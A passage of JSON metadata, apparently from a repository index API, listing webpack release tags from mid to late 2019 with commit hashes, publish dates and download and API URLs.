/github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/